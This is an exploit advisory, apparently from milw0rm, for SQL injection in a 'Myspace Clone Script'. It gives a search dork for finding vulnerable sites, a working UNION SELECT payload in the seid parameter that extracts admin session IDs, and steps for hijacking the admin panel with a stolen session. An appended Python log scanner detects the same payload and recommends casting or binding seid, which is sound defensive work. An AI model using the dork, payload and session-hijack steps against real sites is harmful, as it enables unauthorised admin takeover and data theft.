--==+================================================================================+==--
--==+ Myspace Clone Script SQL Injection Vulnerabilities +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog

SITE: datecomm.com

DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"

DESCRIPTION:

SQL injection in the seid parameter of the forum category page pulls admin session IDs from the database; one of those session IDs is then used to enter the admin area.

EXPLOITS:

index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,sess_id,7,8,9,10/**/FROM/**/admin/*

NOTE/TIP:

After executing the injection, a session ID is shown in the page output.

Use that session ID in the URL below:

admin.php?pg=users&adsess=SESSION_ID

Example:

http://www.site.com/admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123

Do not click Logout, as that deletes the session ID from the database.

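Detection logic for the injection pattern above, written from the defender's side as an added example that is not part of the original advisory: it scans web-server access log lines, undoes the URL-encoding and `/**/` inline-comment obfuscation that the payload relies on, and flags any request whose seid parameter is not an integer or carries a UNION SELECT. The parameter name seid is taken from the advisory; the sample log lines, the IP addresses and the choice of which parameters must be numeric are constructed assumptions for this example.

```python
"""Flag UNION-based SQL injection attempts in access logs (added example, not the advisory's code)."""
import re
from urllib.parse import parse_qs, unquote

# Assumption for this example: seid is a category id and must always be an integer.
NUMERIC_PARAMS = {"seid"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
UNION_SELECT_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)

# Constructed sample log lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Nov/2007:10:01:02 +0000] "GET /index.php?pg=forums&s=viewcat&seid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Nov/2007:10:02:15 +0000] "GET /index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3 HTTP/1.1" 200 6233',
    '203.0.113.9 - - [13/Nov/2007:10:02:40 +0000] "GET /index.php?pg=forums&s=viewcat&seid=-1%252F%252A%252A%252FUNION%252F%252A%252A%252FSELECT%252F%252A%252A%252F1 HTTP/1.1" 200 6100',
    '198.51.100.7 - - [13/Nov/2007:10:03:01 +0000] "GET /index.php?pg=forums&s=viewcat&seid=7&q=union%20station HTTP/1.1" 200 4000',
]


def normalize(value: str) -> str:
    """Undo the obfuscation layers: repeated URL decoding (double encoding),
    /**/ comments used in place of whitespace, and letter case."""
    for _ in range(3):  # bounded, so a pathological value cannot loop forever
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = COMMENT_RE.sub(" ", value)  # '/**/' becomes an ordinary space
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_request(path: str) -> list:
    """Return a list of findings for one request path; empty when the request is clean."""
    findings = []
    query = path.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)  # decodes one layer of %XX
    for name, values in params.items():
        for raw in values:
            norm = normalize(raw)
            if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", norm):
                findings.append(f"{name}: non-integer value in numeric parameter")
            if UNION_SELECT_RE.search(norm):
                findings.append(f"{name}: UNION SELECT payload")
    return findings


def scan_log(lines) -> list:
    """Return (client_ip, path, findings) for every request that produced a finding."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we can parse
        path = match.group(1)
        findings = inspect_request(path)
        if findings:
            hits.append((line.split(" ", 1)[0], path, findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path, "; ".join(findings))
```

The integer check catches the payload even when a new keyword variant slips past the UNION regex, because the application only ever expects a number in seid; the same principle (cast seid to an integer, or bind it as a parameter in a prepared statement) is the fix on the application side. The `q=union station` line is left alone on purpose: a free-text search parameter containing the word "union" is not an injection.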
GREETZ: milw0rm.com, H4CK-Y0u.org!

# milw0rm.com [2007-11-13]